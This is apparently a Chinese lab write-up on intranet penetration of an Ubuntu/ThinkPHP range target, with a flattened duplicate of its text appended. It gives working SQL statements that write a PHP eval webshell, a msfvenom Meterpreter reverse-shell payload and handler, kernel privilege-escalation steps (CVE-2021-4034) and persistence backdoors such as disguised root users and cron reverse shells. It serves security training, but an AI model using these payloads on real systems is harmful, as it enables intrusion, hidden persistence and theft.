初涉内网,提权那些事
字数 1065 2025-08-11 22:57:12

内网渗透与提权技术详解

靶场环境概述

  • 系统: Ubuntu 16.04 (内核版本4.15.0)
  • Web环境: PHP + MySQL + ThinkPHP框架
  • 特点: 老版本ThinkPHP二次开发,静态HTML页面为主

初始信息收集

  1. 目录扫描:发现phpMyAdmin管理界面
  2. 后台爆破:使用Burp Suite爆破phpMyAdmin登录凭证

MySQL提权与Webshell上传

前提条件检查

  1. 检查secure_file_priv设置:

    SHOW VARIABLES LIKE 'secure_file_priv';
    • 值为NULL或指定路径时无法任意目录写入
    • 值为空时可尝试任意目录写入

  2. 其他必要条件:

    • MySQL版本信息
    • 网站绝对路径
    • 数据库root权限
    • GPC关闭(MySQL 5.3.29+默认关闭)

Webshell写入方法

1. INTO OUTFILE方式

SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php';

2. 全局日志方式

SHOW VARIABLES LIKE '%general%';
SET global general_log = on;
SET global general_log_file = '/var/www/html/shell.php';
SELECT '<?php @eval($_POST[cmd]);?>';

3. 慢查询日志方式

SHOW VARIABLES LIKE '%slow_query_log%';
SHOW GLOBAL VARIABLES LIKE '%long_query_time%';
SELECT '<?php @eval($_POST[1]);?>' OR SLEEP(11);

小技巧

  • 先上传PHP探针文件获取环境信息(禁用函数、日志路径等)
  • 使用Python临时HTTP服务传输文件: 
    python3 -m http.server

Webshell连接与绕过

  1. 无禁用函数:使用菜刀等传统工具
  2. 存在禁用函数:使用蚁剑配合disable_function绕过脚本
    • 注意:蚁剑插件需要特殊网络环境下载

反弹Shell与提权准备

  1. 使用MSF生成Linux木马: 
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
  2. 上传并执行: 
    chmod +x shell.elf
./shell.elf
  3. MSF监听设置: 
    use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
run

内核提权技术

信息收集

uname -a

提权脚本来源

  1. Exploit-DB网站搜索
  2. Kali内置搜索: 
    searchsploit <内核版本>
searchsploit -m <漏洞编号>
  3. Linux提权建议脚本: 
    ./linux-exploit-suggester.sh -k <内核版本>
  4. MSF自动检测: 
    run post/multi/recon/local_exploit_suggester

实际提权案例(CVE-2021-4034)

  1. 从GitHub下载对应exp
  2. 上传至目标服务器
  3. 编译执行获取root权限

权限维持方法

  1. 创建隐藏用户

    • 创建具有root权限的用户
    • 用户名伪装成系统服务(如mysqld)

  2. SSH后门

    • 生成root用户的SSH密钥对
    • 保存私钥用于后续登录

  3. 计划任务

    • 设置周期性root权限反弹Shell

  4. 持久化Webshell

    • 不死马/内存马植入

  5. 启动项设置

    • 添加系统启动时执行的恶意脚本

其他提权方式

  1. SUID提权

    find / -perm -u=s -type f 2>/dev/null

  2. Sudo提权

    • 检查sudoers文件配置漏洞

  3. 计划任务提权

    • 检查root权限的定时脚本

  4. MySQL提权

    • 利用CVE-2016-6663等漏洞

总结与进阶方向

  1. 内网渗透完整流程:信息收集→漏洞利用→权限提升→权限维持→横向移动→痕迹清理
  2. 进阶学习方向:
    • 域渗透技术
    • 内网横向移动
    • 端口转发与隧道技术
    • 不同平台提权技术
    • 后渗透阶段技术

注意:本文所述技术仅用于合法授权测试,未经授权使用可能涉及法律风险。

内网渗透与提权技术详解 靶场环境概述 系统: Ubuntu 16.04 (内核版本4.15.0) Web环境: PHP + MySQL + ThinkPHP框架 特点: 老版本ThinkPHP二次开发,静态HTML页面为主 初始信息收集 目录扫描 :发现phpMyAdmin管理界面 后台爆破 :使用Burp Suite爆破phpMyAdmin登录凭证 MySQL提权与Webshell上传 前提条件检查 检查 secure_file_priv 设置: 值为NULL或指定路径时无法任意目录写入 值为空时可尝试任意目录写入 其他必要条件: MySQL版本信息 网站绝对路径 数据库root权限 GPC关闭(MySQL 5.3.29+默认关闭) Webshell写入方法 1. INTO OUTFILE方式 2. 全局日志方式 3. 慢查询日志方式 小技巧 先上传PHP探针文件获取环境信息(禁用函数、日志路径等) 使用Python临时HTTP服务传输文件: Webshell连接与绕过 无禁用函数 :使用菜刀等传统工具 存在禁用函数 :使用蚁剑配合disable_ function绕过脚本 注意:蚁剑插件需要特殊网络环境下载 反弹Shell与提权准备 使用MSF生成Linux木马: 上传并执行: MSF监听设置: 内核提权技术 信息收集 提权脚本来源 Exploit-DB网站搜索 Kali内置搜索: Linux提权建议脚本: MSF自动检测: 实际提权案例(CVE-2021-4034) 从GitHub下载对应exp 上传至目标服务器 编译执行获取root权限 权限维持方法 创建隐藏用户 : 创建具有root权限的用户 用户名伪装成系统服务(如mysqld) SSH后门 : 生成root用户的SSH密钥对 保存私钥用于后续登录 计划任务 : 设置周期性root权限反弹Shell 持久化Webshell : 不死马/内存马植入 启动项设置 : 添加系统启动时执行的恶意脚本 其他提权方式 SUID提权 : Sudo提权 : 检查sudoers文件配置漏洞 计划任务提权 : 检查root权限的定时脚本 MySQL提权 : 利用CVE-2016-6663等漏洞 总结与进阶方向 内网渗透完整流程:信息收集→漏洞利用→权限提升→权限维持→横向移动→痕迹清理 进阶学习方向: 域渗透技术 内网横向移动 端口转发与隧道技术 不同平台提权技术 后渗透阶段技术 注意:本文所述技术仅用于合法授权测试,未经授权使用可能涉及法律风险。